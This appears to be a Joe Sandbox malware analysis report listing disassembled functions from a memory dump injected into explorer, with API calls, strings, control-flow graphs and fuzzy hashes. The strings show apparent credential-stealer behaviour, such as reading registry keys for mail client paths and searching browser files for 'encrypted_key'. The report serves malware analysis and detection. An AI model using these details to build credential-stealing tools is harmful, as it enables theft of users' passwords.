                                                                                                                                      • Opcode ID: 86c7ab7815ab4ef047e4df9f6797b538f0535ce1b576a6a6d7a93cc5e88c6668
                                                                                                                                      • Instruction ID: 167ed9be1bb686e6a33d120501ef97a147f3b4331e48ab434bc0da60c1a1a19b
                                                                                                                                      • Opcode Fuzzy Hash: 86c7ab7815ab4ef047e4df9f6797b538f0535ce1b576a6a6d7a93cc5e88c6668
                                                                                                                                      • Instruction Fuzzy Hash: 06518075205781DFDB15CF56C886A2B7BE5FF88314F10882EE9528B251DB78EC05CB51
                                                                                                                                      Function 007EA40E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 116fileCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 719 7ea40e-7ea424 720 7ea426-7ea42a 719->720 721 7ea4a2-7ea4aa 719->721 723 7ea42c-7ea42f 720->723 724 7ea431-7ea441 720->724 722 7ea4ae-7ea4c8 721->722 727 7ea4cc-7ea4e3 ReadFile 722->727 723->721 723->724 725 7ea469-7ea4a0 memcpy 724->725 726 7ea443 724->726 725->722 728 7ea44a-7ea45a memcpy 726->728 729 7ea445-7ea448 726->729 730 7ea524-7ea538 call 7ea2aa 727->730 731 7ea4e5-7ea4ee 727->731 732 7ea45d 728->732 729->725 729->728 730->732 737 7ea53e-7ea553 memset 730->737 731->730 738 7ea4f0-7ea4ff call 7ea250 731->738 734 7ea45f-7ea466 732->734 737->734 738->727 741 7ea501-7ea51f call 7ea1c6 738->741 741->734
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: memcpy$FileReadmemset
                                                                                                                                      • String ID: winRead
                                                                                                                                      • API String ID: 2051157613-2759563040
                                                                                                                                      • Opcode ID: 0d3b210eb2751b23071a33992471c5e05f8b4a08cf2f1df2a97f9385c01f3307
                                                                                                                                      • Instruction ID: 0d7a678d8e7573b5567bfeb71ede4ee774bdaeb2f72f25315ee243e6fc0285bb
                                                                                                                                      • Opcode Fuzzy Hash: 0d3b210eb2751b23071a33992471c5e05f8b4a08cf2f1df2a97f9385c01f3307
                                                                                                                                      • Instruction Fuzzy Hash: 49318B7220A280BBCB50DE19CC8999F77EAFFC9310F845928F98597251E674FC048B93
                                                                                                                                      Function 007E2E30 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 113registryCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                      • StrStrIW.KERNELBASE(?,?), ref: 007E2E4B
                                                                                                                                      • RegOpenKeyExW.KERNELBASE(?,?,00000000,00020119,?), ref: 007E2EE4
                                                                                                                                      • RegEnumKeyExW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 007E2F54
                                                                                                                                      • RegCloseKey.KERNELBASE(?), ref: 007E2F62
                                                                                                                                        • Part of subcall function 007E19E5: RegOpenKeyExW.KERNELBASE(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,007E1AE2,PortNumber,00000000,00000000), ref: 007E1A1E
                                                                                                                                        • Part of subcall function 007E19E5: RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 007E1A3C
                                                                                                                                        • Part of subcall function 007E19E5: RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 007E1A75
                                                                                                                                        • Part of subcall function 007E19E5: RegCloseKey.KERNELBASE(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,007E1AE2,PortNumber,00000000,00000000), ref: 007E1A98
                                                                                                                                        • Part of subcall function 007E1BC5: lstrlenW.KERNEL32(00000000,00000000,?,007E2E75,PathToExe,00000000,00000000), ref: 007E1BCC
                                                                                                                                        • Part of subcall function 007E1BC5: StrStrIW.SHLWAPI(00000000,.exe,?,007E2E75,PathToExe,00000000,00000000), ref: 007E1BF0
                                                                                                                                        • Part of subcall function 007E1BC5: StrRChrIW.SHLWAPI(00000000,00000000,0000005C,?,007E2E75,PathToExe,00000000,00000000), ref: 007E1C05
                                                                                                                                        • Part of subcall function 007E1BC5: lstrlenW.KERNEL32(00000000,?,007E2E75,PathToExe,00000000,00000000), ref: 007E1C1C
                                                                                                                                        • Part of subcall function 007E1AFE: SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,00000000,00000000,?,?,007E2E83,PathToExe,00000000,00000000), ref: 007E1B16
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CloseOpenQueryValuelstrlen$EnumFolderPath
                                                                                                                                      • String ID: PathToExe
                                                                                                                                      • API String ID: 1799103994-1982016430
                                                                                                                                      • Opcode ID: b4d63dbbb962cc09fbfd92c87e1a97d536c24c956267659d116116461e8af75f
                                                                                                                                      • Instruction ID: c3ce672028d73b0c470fa5886fbdd9a1d75773425c6e1cd9341fa1d5cff7e01e
                                                                                                                                      • Opcode Fuzzy Hash: b4d63dbbb962cc09fbfd92c87e1a97d536c24c956267659d116116461e8af75f
                                                                                                                                      • Instruction Fuzzy Hash: 83319171606291AF8715AF26CC1AC7F7AA9EFCC350F00852CF85587242EE38DD16CBA1
                                                                                                                                      Function 007EA67C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 78fileCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 782 7ea67c-7ea692 783 7ea694-7ea6bf _alldiv _allmul 782->783 784 7ea6c1-7ea6c4 782->784 785 7ea6c7-7ea6d2 call 7ea33b 783->785 784->785 788 7ea6d4-7ea6df 785->788 789 7ea6f0-7ea6fb SetEndOfFile 785->789 790 7ea6e4-7ea6ee call 7ea1c6 788->790 791 7ea71e 789->791 792 7ea6fd-7ea708 789->792 794 7ea722-7ea726 790->794 791->794 792->791 800 7ea70a-7ea71c 792->800 797 7ea73a-7ea740 794->797 798 7ea728-7ea72b 794->798 798->797 799 7ea72d 798->799 801 7ea72f-7ea732 799->801 802 7ea734-7ea737 799->802 800->790 801->797 801->802 802->797
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: File_alldiv_allmul
                                                                                                                                      • String ID: winTruncate1$winTruncate2
                                                                                                                                      • API String ID: 3568847005-470713972
                                                                                                                                      • Opcode ID: 3536270da5d4005ec628aead4edac18ae04174bc090cefd85d16951810e21c93
                                                                                                                                      • Instruction ID: 26361dc385b54427066a5c2f6e1713e9d9253e4e68a0634313c46304d5a5050e
                                                                                                                                      • Opcode Fuzzy Hash: 3536270da5d4005ec628aead4edac18ae04174bc090cefd85d16951810e21c93
                                                                                                                                      • Instruction Fuzzy Hash: 5A21CC72202240BBCB14CE2ACC85E6777A9FF89310F158169FD14CB285DA39EC40CBA2
                                                                                                                                      Function 007E4A71 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 52registryCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 007E1000: GetProcessHeap.KERNEL32(00000008,?,007E11C7,?,?,00000001,00000000,?), ref: 007E1003
                                                                                                                                        • Part of subcall function 007E1000: RtlAllocateHeap.NTDLL(00000000), ref: 007E100A
                                                                                                                                      • wsprintfW.USER32 ref: 007E4AA2
                                                                                                                                      • RegCreateKeyExW.KERNELBASE(80000001,00000000,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 007E4AC7
                                                                                                                                      • RegCloseKey.KERNELBASE(?), ref: 007E4AD4
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Heap$AllocateCloseCreateProcesswsprintf
                                                                                                                                      • String ID: %s\%08x$Software
                                                                                                                                      • API String ID: 1800864259-1658101971
                                                                                                                                      • Opcode ID: d8cf1243339c9f8eb0ea02d0d22312f033b337db0e828dd4dc02a2b62f490710
                                                                                                                                      • Instruction ID: f6a61c4323a822e740578360bcfa9a6ab78c0564086abbeed5ff5e6853aa265d
                                                                                                                                      • Opcode Fuzzy Hash: d8cf1243339c9f8eb0ea02d0d22312f033b337db0e828dd4dc02a2b62f490710
                                                                                                                                      • Instruction Fuzzy Hash: C801DF71601108BFDB189B99DC8ADBF77ADEB85354F40416EF505E3140EAB06E9096A4
                                                                                                                                      Function 007E4317 Relevance: 7.6, APIs: 5, Instructions: 64registryCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • _alloca_probe.NTDLL ref: 007E431C
                                                                                                                                      • RegOpenKeyW.ADVAPI32(80000001,?,?), ref: 007E4335
                                                                                                                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 007E4363
                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 007E43C8
                                                                                                                                        • Part of subcall function 007E1953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,007E2F0C), ref: 007E1973
                                                                                                                                        • Part of subcall function 007E1953: lstrlenW.KERNEL32(00836564,?,?,007E2F0C), ref: 007E1978
                                                                                                                                        • Part of subcall function 007E1953: lstrcatW.KERNEL32(00000000,?,?,?,007E2F0C), ref: 007E1990
                                                                                                                                        • Part of subcall function 007E1953: lstrcatW.KERNEL32(00000000,00836564,?,?,007E2F0C), ref: 007E1994
                                                                                                                                        • Part of subcall function 007E418A: wsprintfW.USER32 ref: 007E4212
                                                                                                                                        • Part of subcall function 007E1011: GetProcessHeap.KERNEL32(00000000,00000000,?,007E1A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,007E1AE2), ref: 007E1020
                                                                                                                                        • Part of subcall function 007E1011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,007E1AE2,PortNumber,00000000,00000000), ref: 007E1027
                                                                                                                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 007E43B9
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: EnumHeaplstrcatlstrlen$CloseFreeOpenProcess_alloca_probewsprintf
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 801677237-0
                                                                                                                                      • Opcode ID: 3c6f5d7c561c886c1d9dc21258ad58932945e323c99e67f99f491bc18eec7653
                                                                                                                                      • Instruction ID: 0d8d5f106fd94c26befcb4ec0964f7b529e6651ff84abfc7de0caaac9f417ed3
                                                                                                                                      • Opcode Fuzzy Hash: 3c6f5d7c561c886c1d9dc21258ad58932945e323c99e67f99f491bc18eec7653
                                                                                                                                      • Instruction Fuzzy Hash: 881182B1104241BFE7159B15CC5ADBF77ECFB88304F00892EF489E2110EB78AD589A72
                                                                                                                                      Function 007EB87B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 202fileCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • memset.NTDLL ref: 007EB8D5
                                                                                                                                      • CreateFileW.KERNELBASE(00000000,?,00000003,00000000,-00000003,?,00000000), ref: 007EB96F
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CreateFilememset
                                                                                                                                      • String ID: psow$winOpen
                                                                                                                                      • API String ID: 2416746761-4101858489
                                                                                                                                      • Opcode ID: 9ebe96e02f796bfed02407f35421ed0797ee222f19fe03bfa6669f4441c8fcff
                                                                                                                                      • Instruction ID: 986d52b05f857f9d401d9a4edfdc103b93b5146e8d2651110c1ef0288d735815
                                                                                                                                      • Opcode Fuzzy Hash: 9ebe96e02f796bfed02407f35421ed0797ee222f19fe03bfa6669f4441c8fcff
                                                                                                                                      • Instruction Fuzzy Hash: 6B717D71A06742DFCB10DF2AC88571ABBE0FF88364F104A29F964D7291D778E944CB92
                                                                                                                                      Function 007E19E5 Relevance: 6.1, APIs: 4, Instructions: 89registryCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • RegOpenKeyExW.KERNELBASE(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,007E1AE2,PortNumber,00000000,00000000), ref: 007E1A1E
                                                                                                                                      • RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 007E1A3C
                                                                                                                                      • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 007E1A75
                                                                                                                                      • RegCloseKey.KERNELBASE(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,007E1AE2,PortNumber,00000000,00000000), ref: 007E1A98
                                                                                                                                        • Part of subcall function 007E1011: GetProcessHeap.KERNEL32(00000000,00000000,?,007E1A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,007E1AE2), ref: 007E1020
                                                                                                                                        • Part of subcall function 007E1011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,007E1AE2,PortNumber,00000000,00000000), ref: 007E1027
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: HeapQueryValue$CloseFreeOpenProcess
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 217796345-0
                                                                                                                                      • Opcode ID: d0c3ff357eda2577dcf5621a8ed30f9f93c4d3b64550f1a2ee2571f968db1c10
                                                                                                                                      • Instruction ID: 613b251175bd99feb4a309a537569609732d7dc52831f22b7b20d6c62e884a52
                                                                                                                                      • Opcode Fuzzy Hash: d0c3ff357eda2577dcf5621a8ed30f9f93c4d3b64550f1a2ee2571f968db1c10
                                                                                                                                      • Instruction Fuzzy Hash: A321A2722072C1AFE7288B269D0AF7B77E9EBCC744F048A2DF58592140E638DD408721
                                                                                                                                      Function 007E1EC1 Relevance: 6.1, APIs: 4, Instructions: 82registryCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • RegOpenKeyW.ADVAPI32(?,?,?), ref: 007E1ED5
                                                                                                                                        • Part of subcall function 007E1000: GetProcessHeap.KERNEL32(00000008,?,007E11C7,?,?,00000001,00000000,?), ref: 007E1003
                                                                                                                                        • Part of subcall function 007E1000: RtlAllocateHeap.NTDLL(00000000), ref: 007E100A
                                                                                                                                      • RegEnumKeyExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 007E1F0C
                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 007E1F98
                                                                                                                                        • Part of subcall function 007E1953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,007E2F0C), ref: 007E1973
                                                                                                                                        • Part of subcall function 007E1953: lstrlenW.KERNEL32(00836564,?,?,007E2F0C), ref: 007E1978
                                                                                                                                        • Part of subcall function 007E1953: lstrcatW.KERNEL32(00000000,?,?,?,007E2F0C), ref: 007E1990
                                                                                                                                        • Part of subcall function 007E1953: lstrcatW.KERNEL32(00000000,00836564,?,?,007E2F0C), ref: 007E1994
                                                                                                                                      • RegEnumKeyExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 007E1F82
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: EnumHeaplstrcatlstrlen$AllocateCloseOpenProcess
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1077800024-0
                                                                                                                                      • Opcode ID: db544485bdec4daf57e7f5def7687afde48fc68ac02b525625291f46ded6f57e
                                                                                                                                      • Instruction ID: 50d0959849a62c525565d982cf68ad6dba6e8bb2ca705fd792525fddbe39dcb7
                                                                                                                                      • Opcode Fuzzy Hash: db544485bdec4daf57e7f5def7687afde48fc68ac02b525625291f46ded6f57e
                                                                                                                                      • Instruction Fuzzy Hash: 7D219C70209381BFD7059B26CC4AD2FBBEDEFC8304F40892CF49992111EB38CD149A62
                                                                                                                                      Function 007E1C31 Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000000,00000000,00000000,007E3E1E,00000000,?,007E3FA8), ref: 007E1C46
                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,00000000,?,007E3FA8), ref: 007E1C56
                                                                                                                                      • CloseHandle.KERNELBASE(00000000,?,007E3FA8), ref: 007E1C91
                                                                                                                                        • Part of subcall function 007E1000: GetProcessHeap.KERNEL32(00000008,?,007E11C7,?,?,00000001,00000000,?), ref: 007E1003
                                                                                                                                        • Part of subcall function 007E1000: RtlAllocateHeap.NTDLL(00000000), ref: 007E100A
                                                                                                                                      • ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000,?,007E3FA8), ref: 007E1C76
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: File$Heap$AllocateCloseCreateHandleProcessReadSize
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2517252058-0
                                                                                                                                      • Opcode ID: 3b29932cafcbb3c2f04e34e5fadfa910323f091720ace1f11d3d96ba3d7ccdcb
                                                                                                                                      • Instruction ID: 22d3519a3bb3135e7ac44189c36541e9598472e9628137f5efe2f64ab6643699
                                                                                                                                      • Opcode Fuzzy Hash: 3b29932cafcbb3c2f04e34e5fadfa910323f091720ace1f11d3d96ba3d7ccdcb
                                                                                                                                      • Instruction Fuzzy Hash: 5CF0F4312012187BC2241B2ADC8AE7F7B5CEB8A7F9B220B18F405D21A0FB2A6C514170
                                                                                                                                      Function 007E2FB1 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 31stringCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • StrStrIA.KERNELBASE(00000000,"encrypted_key":",00000000,00000000,00000000,007E3E30,00000000,00000000,?,007E3FA8), ref: 007E2FC1
                                                                                                                                      • lstrlen.KERNEL32("encrypted_key":",?,007E3FA8), ref: 007E2FCE
                                                                                                                                      • StrStrIA.SHLWAPI("encrypted_key":",0083692C,?,007E3FA8), ref: 007E2FDD
                                                                                                                                        • Part of subcall function 007E190B: lstrlen.KERNEL32(?,?,?,?,00000000,007E2783), ref: 007E192B
                                                                                                                                        • Part of subcall function 007E190B: lstrlen.KERNEL32(00000000,?,?,?,00000000,007E2783), ref: 007E1930
                                                                                                                                        • Part of subcall function 007E190B: lstrcat.KERNEL32(00000000,?), ref: 007E1946
                                                                                                                                        • Part of subcall function 007E190B: lstrcat.KERNEL32(00000000,00000000), ref: 007E194A
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: lstrlen$lstrcat
                                                                                                                                      • String ID: "encrypted_key":"
                                                                                                                                      • API String ID: 493641738-877455259
                                                                                                                                      • Opcode ID: 898b3b53b0443b903bc3b1724a2e6f4371e9d1098b0799c88be7a7d5ddc12f0d
                                                                                                                                      • Instruction ID: aa6d3f0543ed89104f8c92d90e7be16b4611101c9be7a98534360bd05368fa01
                                                                                                                                      • Opcode Fuzzy Hash: 898b3b53b0443b903bc3b1724a2e6f4371e9d1098b0799c88be7a7d5ddc12f0d
                                                                                                                                      • Instruction Fuzzy Hash: 15E02B227076A47F97216BBE1C5484B7F1CBE4A2103084064F601D3113FF9A8812D2E0
                                                                                                                                      Function 007EBAFC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • GetFileAttributesW.KERNELBASE(00000000,00000000,00000000,?,readonly_shm,00000000,00000000,?,?,?), ref: 007EBB40
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AttributesFile
                                                                                                                                      • String ID: winDelete
                                                                                                                                      • API String ID: 3188754299-3936022152
                                                                                                                                      • Opcode ID: b0853793c737eeaa08eca8ffa72d1b2cd435ad249837df64b9a6a8c13e191fd2
                                                                                                                                      • Instruction ID: 2e3cea40e13bc8ad5d191d0ea10a7bbb8676ff7fcbbcd82539bc627808740475
                                                                                                                                      • Opcode Fuzzy Hash: b0853793c737eeaa08eca8ffa72d1b2cd435ad249837df64b9a6a8c13e191fd2
                                                                                                                                      • Instruction Fuzzy Hash: 4F11E575A02298EB8B11AB6B884587E7F75EB99760F104225F801E7284DB389D019652
                                                                                                                                      Function 007E2EA5 Relevance: 4.5, APIs: 3, Instructions: 43registryCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 007E1011: GetProcessHeap.KERNEL32(00000000,00000000,?,007E1A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,007E1AE2), ref: 007E1020
                                                                                                                                        • Part of subcall function 007E1011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,007E1AE2,PortNumber,00000000,00000000), ref: 007E1027
                                                                                                                                        • Part of subcall function 007E1000: GetProcessHeap.KERNEL32(00000008,?,007E11C7,?,?,00000001,00000000,?), ref: 007E1003
                                                                                                                                        • Part of subcall function 007E1000: RtlAllocateHeap.NTDLL(00000000), ref: 007E100A
                                                                                                                                      • RegOpenKeyExW.KERNELBASE(?,?,00000000,00020119,?), ref: 007E2EE4
                                                                                                                                      • RegEnumKeyExW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 007E2F54
                                                                                                                                      • RegCloseKey.KERNELBASE(?), ref: 007E2F62
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Heap$Process$AllocateCloseEnumFreeOpen
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1066184869-0
                                                                                                                                      • Opcode ID: 0f429e1a00111c14b51ca50617d4716a4b8503841909cdb3355ca594c77dfb02
                                                                                                                                      • Instruction ID: 1be05fbe46d1bc5009904be0f12999e2f9c88933adc97ebfe27ff724df7ce806
                                                                                                                                      • Opcode Fuzzy Hash: 0f429e1a00111c14b51ca50617d4716a4b8503841909cdb3355ca594c77dfb02
                                                                                                                                      • Instruction Fuzzy Hash: 5D016231206290ABC7199F22DC1AD6F7BADEFC9350F00442DF85992151EA398D56EBA1
                                                                                                                                      Function 007E4B72 Relevance: 4.5, APIs: 3, Instructions: 8COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ExitInitializeProcessUninitialize
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 4175140541-0
                                                                                                                                      • Opcode ID: 7d74f52ea0661175bd53b9bcb5938ab0b95c9b389d291b928dd8465730274ada
                                                                                                                                      • Instruction ID: 473007803959f2f04c8372b5077f432206aac9f0e73dcc1ad915f4db8fa50dd9
                                                                                                                                      • Opcode Fuzzy Hash: 7d74f52ea0661175bd53b9bcb5938ab0b95c9b389d291b928dd8465730274ada
                                                                                                                                      • Instruction Fuzzy Hash: 1EC09B30345240EBE6803BF5DC0D70E3794BF88713F01C814F205C9091FB5444208632
                                                                                                                                      Function 007E9FC8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 44memoryCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • HeapCreate.KERNELBASE(00000000,00BD0000,00000000), ref: 007E9FF8
                                                                                                                                      Strings
                                                                                                                                      • failed to HeapCreate (%lu), flags=%u, initSize=%lu, maxSize=%lu, xrefs: 007EA00E
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CreateHeap
                                                                                                                                      • String ID: failed to HeapCreate (%lu), flags=%u, initSize=%lu, maxSize=%lu
                                                                                                                                      • API String ID: 10892065-982776804
                                                                                                                                      • Opcode ID: 2528f7d044721bfbba8e29e008fba8ced49d6d05d8f7332a91c7eb3097c847b8
                                                                                                                                      • Instruction ID: d5d1bc5052230e76df70fc1b50cd5a1b695524abaa091ecdfab793bf4edc0bab
                                                                                                                                      • Opcode Fuzzy Hash: 2528f7d044721bfbba8e29e008fba8ced49d6d05d8f7332a91c7eb3097c847b8
                                                                                                                                      • Instruction Fuzzy Hash: DDF08B7760A3C0BAEB305A52AC88F27679CEBCDB85F100819FA41C2241F278BC40C231
                                                                                                                                      Function 007E1AFE Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 007E1000: GetProcessHeap.KERNEL32(00000008,?,007E11C7,?,?,00000001,00000000,?), ref: 007E1003
                                                                                                                                        • Part of subcall function 007E1000: RtlAllocateHeap.NTDLL(00000000), ref: 007E100A
                                                                                                                                      • SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,00000000,00000000,?,?,007E2E83,PathToExe,00000000,00000000), ref: 007E1B16
                                                                                                                                        • Part of subcall function 007E1011: GetProcessHeap.KERNEL32(00000000,00000000,?,007E1A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,007E1AE2), ref: 007E1020
                                                                                                                                        • Part of subcall function 007E1011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,007E1AE2,PortNumber,00000000,00000000), ref: 007E1027
                                                                                                                                        • Part of subcall function 007E19E5: RegOpenKeyExW.KERNELBASE(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,007E1AE2,PortNumber,00000000,00000000), ref: 007E1A1E
